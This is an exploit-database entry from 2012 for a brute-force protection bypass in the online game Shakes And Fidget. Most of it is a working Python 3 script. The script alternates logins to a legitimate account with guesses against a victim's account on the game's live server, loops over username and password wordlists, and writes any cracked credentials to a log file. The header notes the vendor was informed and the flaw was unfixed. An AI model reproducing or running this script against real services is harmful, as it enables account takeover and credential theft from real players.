Shakes And Fidget - Brute Force Protection Bypass

2012-07-04T00:00:00
ID 1337DAY-ID-18915
Type zdt
Reporter SnakingMax
Modified 2012-07-04T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                             # Exploit Title: [Shakes And Fidget - Brute Force Protection Bypass]
 # Date: [04/07/2012]
 # Author: [SnakingMax]
 # Website: http://snakingmax.blogspot.com/
 # Software Link: [http://www.sfgame.es/]
 # Vendor: Playa Games GmbH
# Category: [Remote Exploit]


# Vulnerability description:
# Bypass brute force protection by alternating a positive attempt (legitimate account)
# with a test attempt (victim's account).
#
# 26/12/2011 - Vendor informed
# 04/07/2012 - Vulnerability not fixed


######################### EXPLOIT CODE (python 3) ############################

import sys, time, hashlib
from random import randrange
from http.client import HTTPConnection
import urllib.request

	
def str2md5( string ):
	return hashlib.md5(string.encode('utf-8')).hexdigest()


def tryUserPass(username, password):
	print("Trying User: "+username+" and Pass:"+password)
	conn = HTTPConnection('s4.sfgame.es')
	# positive attempt (legitimate account)
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002sfbf%3Bacc1c81abcdab1f53cfdfe7030c076bc%3Bv1.60&random=%2&rnd=0")
	response = conn.getresponse()
	response.close()
	conn.close()
	conn = HTTPConnection('s4.sfgame.es')
	# test attempt (victim's account)
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002{0}%3B{1}%3Bv1.60&random=%2&rnd={2}".format(username.strip(),str2md5(str(password.strip())), randrange(999999)))
	response = conn.getresponse()
	data = response.read()[:10]
	response.close()
	conn.close()
	if (len(str(data)) > 7):
		print("Password found. See log.txt file.")
		return True
	else:
		return False

def bruteforce(userlist, pwdlist):
	usersFileList = open ( userlist , 'rt')
	dumpUsers = usersFileList.read()
	usersFileList.close()
	userl = dumpUsers.split()
	pwdFileList = open (pwdlist, 'rt')
	dumpPwd = pwdFileList.read()
	pwdl = dumpPwd.split()
	pwdFileList.close()
	for i in range(len(userl)):
		for j in range(len(pwdl)):
			if (tryUserPass(userl[i], pwdl[j])):
				log = open ('log.txt', 'at')
				log.write("\n------PASSWORD FOUND------\nUsername: " + userl[i] + "\nPassword: " + pwdl[j] + "\n--------------------------")
				log.close()

if ( (__name__)=="__main__" ):
	if len(sys.argv) != 3:
		print("usage:\n")
		print( sys.argv[0]+" [userlist.txt] [pwdlist.txt]\n\n")
		print("Downloaded from: http://snakingmax.blogspot.com/")
	else:
		userlist = sys.argv[1];
		pwdlist = sys.argv[2];
		print("Trying Username/Password combinations...")
		bruteforce(userlist, pwdlist)

######################### END OF EXPLOIT CODE (python 3) ############################



#  0day.today [2018-02-15]  #